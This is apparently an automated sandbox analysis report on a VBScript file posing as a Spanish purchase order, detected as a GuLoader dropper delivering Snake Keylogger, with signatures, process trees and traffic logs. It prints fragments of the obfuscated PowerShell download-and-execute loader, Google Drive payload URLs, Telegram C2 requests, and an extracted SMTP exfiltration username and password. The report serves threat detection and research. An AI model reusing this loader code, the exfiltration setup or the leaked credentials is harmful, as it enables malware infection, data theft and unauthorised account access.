Windows Analysis Report
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs

Overview

General Information

Sample name:Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
renamed because original name is a hash value
Original sample name:Distribuciones Enelca Jan, S.L. PEDIDO 456799.vbs
Analysis ID:1540334
MD5:3f13eef87515d70fbdfedc6de7b6efc4
SHA1:8d2394c2e4daada6b8d9af1b60d8d11130ac1845
SHA256:a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
Tags: vbs, user-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7792 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1516 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4104 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

{"Exfil Mode": "SMTP", "Username": "daniberto@daniberto.com", "Password": "Fabrica1221.", "Host": "mail.daniberto.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000005.00000002.1722877673.0000000008160000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000005.00000002.1723278711.00000000089D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7924.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_1516.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (listed below)
              • 0xc796:$b2: ::FromBase64String(
              • 0xb817:$s1: -join
              • 0x4fc3:$s4: +=
              • 0x5085:$s4: +=
              • 0x92ac:$s4: +=
              • 0xb3c9:$s4: +=
              • 0xb6b3:$s4: +=
              • 0xb7f9:$s4: +=
              • 0x15f8d:$s4: +=
              • 0x1600d:$s4: +=
              • 0x160d3:$s4: +=
              • 0x16153:$s4: +=
              • 0x16329:$s4: +=
              • 0x163ad:$s4: +=
              • 0xc03f:$e4: Get-WmiObject
              • 0xc22e:$e4: Get-Process
              • 0xc286:$e4: Start-Process
              • 0x16cc5:$e4: Get-Process

              System Summary

              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine|base64offset|contains: wq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", ProcessId: 7792, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4104, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49970
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine|base64offset|contains: wq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", ProcessId: 7792, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script omitted]
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T17:23:52.764154+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49981 | 188.114.96.3 | 443 | TCP
2024-10-23T17:23:54.408561+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49983 | 188.114.96.3 | 443 | TCP
2024-10-23T17:23:57.816069+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49987 | 188.114.96.3 | 443 | TCP
2024-10-23T17:24:01.095815+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49991 | 188.114.96.3 | 443 | TCP
2024-10-23T17:23:50.053333+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49979 | 193.122.6.168 | 80 | TCP
2024-10-23T17:23:52.053083+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49979 | 193.122.6.168 | 80 | TCP
2024-10-23T17:23:53.756217+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49982 | 193.122.6.168 | 80 | TCP
2024-10-23T17:23:44.455140+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49970 | 142.250.185.206 | 443 | TCP

              AV Detection

              Source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "daniberto@daniberto.com", "Password": "Fabrica1221.", "Host": "mail.daniberto.com", "Port": "587", "Version": "4.4"}
              Source: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsReversingLabs: Detection: 18%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.6% probability

              Location Tracking

              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49980 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49970 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49996 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000005.00000002.1714023781.0000000006DD5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbe source: powershell.exe, 00000005.00000002.1721313369.0000000007F34000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCF45Dh7_2_02DCF2C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCF45Dh7_2_02DCF4AC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCF45Dh7_2_02DCF52F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCFC19h7_2_02DCF961

              Networking

              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49982 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49979 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49987 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49983 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49981 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49991 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49970 -> 142.250.185.206:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49980 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 23 Oct 2024 15:24:05 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49970 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49996 version: TLS 1.2

              System Summary

              Source: amsi32_1516.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              Source: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7033
              Source: unknown Process created: Commandline size = 7033
              Source: amsi32_1516.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@8/7@5/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Bindehindens.Stu
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2112:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sytlxl2n.m0d.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7924
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1516
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs ReversingLabs: Detection: 18%
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. 
OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. 
OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
